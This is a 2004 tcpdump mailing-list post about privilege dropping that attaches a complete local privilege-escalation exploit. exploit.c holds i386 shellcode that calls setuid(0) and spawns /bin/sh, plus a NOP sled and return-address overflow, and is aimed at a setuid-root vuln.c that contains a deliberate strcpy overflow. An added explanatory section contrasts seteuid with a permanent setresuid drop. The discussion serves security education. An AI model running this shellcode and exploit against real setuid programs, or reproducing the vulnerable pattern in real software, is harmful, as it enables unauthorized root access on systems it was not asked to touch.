tcpdump mailing list archives

Re: OpenBSD work on Tcpdump privilege separation - OFFTOPIC


From: Rodrigo Rubira Branco <rodrigo () firewalls com br>
Date: Wed, 25 Feb 2004 17:00:25 -0300

Pekka,

I attached to this mail one vuln.c program and one exploit.c to demonstrate a shellcode that calls setuid(0) and gains root privileges...

This technique is a simple demonstration of what I mentioned earlier.

Thank you,

Rodrigo.

Pekka Savola wrote:
On Wed, 25 Feb 2004, Rodrigo Rubira Branco wrote:

Simply calling setuid(getuid()) isn't sufficient, because if an attacker discovers a buffer overflow, it is possible for him to insert a call to setuid in his shellcode and gain root privileges.


Hmm.. I'm not sure if I understand what you're referring to? Could you elaborate + provide a patch or description of the "proper" means?

It is assumed that the attacker would only be able to insert shellcode or exploit the system after the privileges have been dropped -- not before that.

Note that setuid(getuid()) is only done if the binary is setuid root. For a regular binary, you'll setuid to the specific account.


--
Rodrigo Rubira Branco
Security & Infrastructure
Firewalls Security Corporation
rodrigo () firewalls com br
Tel:  55(14) 3234-5665
Cel:  55(14) 9795-1850
Site:  http://www.firewalls.com.br

Privacy Notice

The information contained in this e-mail and in the attached files is for the
exclusive use of the addressee indicated here, and may contain trade secrets, intellectual property or other confidential information protected by applicable law. If you are not the intended recipient, you are hereby notified
that any review, reading, copying and/or disclosure of the contents
of this e-mail is strictly prohibited and unauthorized. Please
delete the contents of the e-mail and notify the sender immediately.

Thank you for your cooperation.

/* exploit.c: builds the overflow string and runs ./vuln with it.
 * i386 Linux only (inline asm, int 0x80 shellcode); build with
 * e.g. gcc -m32 -O0 -o exploit exploit.c */
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include<unistd.h>

#define ALIGN                             0
#define OFFSET                            0
#define RET_POSITION                   1024
#define RANGE                            20
#define NOP                            0x90

/* setuid(0), then execve("/bin/sh", {"/bin/sh", NULL}, NULL), then exit(0).
 * The setuid(0) works only while the saved uid of the process is still 0. */
char shellcode[]=
        "\x31\xc0"                      /* xorl  %eax,%eax                  */
        "\x31\xdb"                      /* xorl  %ebx,%ebx                  */
        "\xb0\x17"                      /* movb  $0x17,%al   setuid = 23    */
        "\xcd\x80"                      /* int   $0x80       setuid(0)      */
        "\xeb\x1f"                      /* jmp   to the call at the end     */
        "\x5e"                          /* popl  %esi        -> "/bin/sh"   */
        "\x89\x76\x08"                  /* movl  %esi,0x8(%esi)  argv[0]    */
        "\x31\xc0"                      /* xorl  %eax,%eax                  */
        "\x88\x46\x07"                  /* movb  %al,0x7(%esi)   NUL-term.  */
        "\x89\x46\x0c"                  /* movl  %eax,0xc(%esi)  argv[1]=0  */
        "\xb0\x0b"                      /* movb  $0xb,%al    execve = 11    */
        "\x89\xf3"                      /* movl  %esi,%ebx       path       */
        "\x8d\x4e\x08"                  /* leal  0x8(%esi),%ecx  argv       */
        "\x8d\x56\x0c"                  /* leal  0xc(%esi),%edx  envp       */
        "\xcd\x80"                      /* int   $0x80       execve         */
        "\x31\xdb"                      /* xorl  %ebx,%ebx                  */
        "\x89\xd8"                      /* movl  %ebx,%eax                  */
        "\x40"                          /* incl  %eax        exit = 1       */
        "\xcd\x80"                      /* int   $0x80       exit(0)        */
        "\xe8\xdc\xff\xff\xff"          /* call  back to the popl above     */
        "/bin/sh";

/* Current stack pointer; relies on %eax being the return register */
unsigned long get_sp(void)
{
        __asm__("movl %esp,%eax");
}

int main(int argc,char **argv)
{
        char buff[RET_POSITION+RANGE+ALIGN+1],*ptr;
        long addr;
        unsigned long sp;
        int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1;
        int i;

        if(argc>1)
                offset=atoi(argv[1]);

        sp=get_sp();
        addr=sp-offset;

        /* fill the whole buffer with the guessed return address */
        for(i=0;i+3<bsize;i+=4)
        {
                buff[i+ALIGN]=(addr&0x000000ff);
                buff[i+ALIGN+1]=(addr&0x0000ff00)>>8;
                buff[i+ALIGN+2]=(addr&0x00ff0000)>>16;
                buff[i+ALIGN+3]=(addr&0xff000000)>>24;
        }

        /* NOP sled in front, shellcode, then the return addresses */
        for(i=0;i<bsize-RANGE*2-(int)strlen(shellcode)-1;i++)
                buff[i]=NOP;

        ptr=buff+bsize-RANGE*2-strlen(shellcode)-1;
        for(i=0;i<(int)strlen(shellcode);i++)
                *(ptr++)=shellcode[i];

        buff[bsize-1]='\0';

        printf("Jump to 0x%08lx\n",addr);

        execl("./vuln","vuln",buff,(char *)NULL);
        perror("execl");
        return 1;
}

/* vuln.c: make it setuid root (chown root vuln; chmod 4755 vuln) to reproduce */
#include<string.h>
#include<unistd.h>

int main(int argc,char **argv)
{
        char buffer[1024];
        seteuid(getuid());      /* drops only the effective uid; saved uid stays 0 */
        if(argc>1)
                strcpy(buffer,argv[1]);  /* unbounded copy: the overflow */
        return 0;
}
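The difference between the seteuid() call in the attached vuln.c and a full privilege drop, as an added example that is not part of this mail or of tcpdump: drop_privileges_permanently() uses setresuid() so that the real, effective and saved uid all become the target uid and then checks the result with getresuid(), while drop_privileges_temporarily() changes only the effective uid, as vuln.c does. can_regain_root() makes the same setuid(0) call the attached shellcode makes. The function names, the fallback uid 65534 and the printed layout are my own choices; the code assumes Linux with glibc, where setresuid()/getresuid() need _GNU_SOURCE.

```c
/* Added example (not from the thread): permanent vs. temporary uid drop */
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

/* Permanently drop to `target`: real, effective and saved uid all become
 * `target`, so a later setuid(0) has no saved uid 0 to fall back on.
 * The result is verified, because an unchecked, failed drop is the
 * classic mistake. Returns 0 on success, -1 otherwise. */
int drop_privileges_permanently(uid_t target)
{
    uid_t ruid, euid, suid;

    if (setresuid(target, target, target) != 0)
        return -1;
    if (getresuid(&ruid, &euid, &suid) != 0)
        return -1;
    if (ruid != target || euid != target || suid != target)
        return -1;
    return 0;
}

/* Temporary drop, the pattern in vuln.c: only the effective uid changes,
 * the saved uid keeps its old value (0 for a setuid-root binary). */
int drop_privileges_temporarily(uid_t target)
{
    return seteuid(target);
}

/* The same call the shellcode makes (syscall 23 on Linux/x86).
 * Returns 1 if the process is effectively root afterwards, 0 if not. */
int can_regain_root(void)
{
    if (setuid(0) == 0 && geteuid() == 0)
        return 1;
    return 0;
}

int main(void)
{
    uid_t ruid, euid, suid;
    /* when started as root, drop to 65534 (nobody on most systems) */
    uid_t target = (getuid() == 0) ? (uid_t)65534 : getuid();

    if (drop_privileges_permanently(target) != 0) {
        perror("setresuid");
        return 1;
    }
    getresuid(&ruid, &euid, &suid);
    printf("ruid=%u euid=%u suid=%u, setuid(0) regains root: %s\n",
           (unsigned)ruid, (unsigned)euid, (unsigned)suid,
           can_regain_root() ? "yes" : "no");
    return 0;
}
```

Started as root, a drop_privileges_temporarily() followed by can_regain_root() reports "yes", exactly the situation the attached exploit relies on; after drop_privileges_permanently() it reports "no". Note that setuid(getuid()) called while the effective uid is 0 also sets all three uids on Linux, so it is a permanent drop as well; what leaves the saved uid at 0 in vuln.c is the use of seteuid().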
